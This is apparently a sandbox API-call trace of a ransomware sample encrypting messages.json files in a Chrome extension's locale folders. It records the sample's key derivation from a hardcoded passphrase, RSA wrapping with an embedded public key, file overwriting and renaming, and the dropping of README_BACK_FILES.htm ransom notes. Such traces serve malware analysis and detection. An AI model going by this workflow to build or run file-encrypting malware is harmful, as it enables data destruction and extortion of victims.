(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.578] GetFileType (hFile=0x5d50) returned 0x1 [0255.578] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.579] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.579] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.579] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.579] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.580] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.580] GetLastError () returned 0x0 [0255.580] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json")) returned 0x20 [0255.580] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json", dwFileAttributes=0x80) returned 1 [0255.580] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.581] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.582] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.582] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.584] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.585] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.585] CryptHashData (hHash=0x2e18828, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.585] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.585] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.585] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.585] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e11a30) returned 1 [0255.585] CryptImportPublicKeyInfo (in: hCryptProv=0x2e11a30, dwCertEncodingType=0x1, pInfo=0x2e29fd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a000*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a008*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18ea8) returned 1 [0255.586] CryptEncrypt (in: hKey=0x2e18ea8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.586] CryptEncrypt (in: hKey=0x2e18ea8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e11348*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e11348*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.586] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e11348*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e11348*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.588] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xc5, lpOverlapped=0x0) returned 1 [0255.589] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0255.589] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0255.589] CloseHandle (hObject=0x5d5c) returned 1 [0255.589] CloseHandle (hObject=0x5d60) returned 1 [0255.590] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), bFailIfExists=0) returned 1 [0255.593] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json", dwFileAttributes=0x0) returned 1 [0255.594] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.gsg")) returned 1 [0255.595] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.fuck")) returned 1 [0255.596] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.596] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.596] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.596] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.596] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.596] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\readme_back_files.htm")) returned 0xffffffff [0255.597] AreFileApisANSI () returned 1 [0255.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.597] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.597] GetFileType (hFile=0x5d50) returned 0x1 [0255.597] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.599] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.599] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0255.600] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.600] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.600] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.600] GetLastError () returned 0x0 [0255.600] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json")) returned 0x20 [0255.600] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json", dwFileAttributes=0x80) returned 1 [0255.601] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.602] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.603] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.604] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.607] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.607] lstrlenA (lpString="uYKlbJKbxodHSMQeKdWUGXPdzMlQm") returned 29 [0255.607] CryptHashData (hHash=0x2e186a8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.607] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.607] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.607] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.607] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12aa8) returned 1 [0255.608] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12aa8, dwCertEncodingType=0x1, pInfo=0x2e29af0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29b20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29b28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18968) returned 1 [0255.608] CryptEncrypt (in: hKey=0x2e18968, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.608] CryptEncrypt (in: hKey=0x2e18968, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e12888*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e12888*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.608] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e12888*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e12888*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.609] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xbe, lpOverlapped=0x0) returned 1 [0255.610] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xbe, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0255.610] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0255.611] CloseHandle (hObject=0x5d60) returned 1 [0255.611] CloseHandle (hObject=0x5d5c) returned 1 [0255.611] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), bFailIfExists=0) returned 1 [0255.615] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json", dwFileAttributes=0x0) returned 1 [0255.615] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.gsg")) returned 1 [0255.618] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.fuck")) returned 1 [0255.619] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0255.619] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.619] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.619] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.620] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0255.620] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\readme_back_files.htm")) returned 0xffffffff [0255.620] AreFileApisANSI () returned 1 [0255.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.620] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.621] GetFileType (hFile=0x5d50) returned 0x1 [0255.621] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.623] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.623] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.623] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.623] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.623] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.623] GetLastError () returned 0x0 [0255.623] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json")) returned 0x20 [0255.624] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json", dwFileAttributes=0x80) returned 1 [0255.624] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.625] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 